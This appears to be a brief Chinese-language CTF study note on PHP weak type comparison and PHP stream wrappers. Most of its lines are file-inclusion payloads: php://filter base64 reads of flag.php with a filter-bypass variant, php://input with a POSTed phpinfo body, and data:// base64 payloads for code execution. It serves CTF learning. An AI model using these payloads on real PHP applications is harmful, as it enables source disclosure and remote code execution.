知识点
- PHP弱类型比较
- PHP伪协议
file=php://filter/read=convert.base64-encode/resource=flag.php
file=php://filter/convert.base64-encode/resource=flag.php(过滤了操作名read 的绕过方法)
file=php://filter/write=convert.base64-decode/resource=flag.php
file=php://input
post:<?php phpinfo();?>
碰到file_get_content()就要想到用php://input来绕过,注意:当head头有enctype=”multipart/form-data”时,该伪协议无效
file=data://text/plain;base64,base64编码的payload
注意:这里的执行代码不要用?>闭合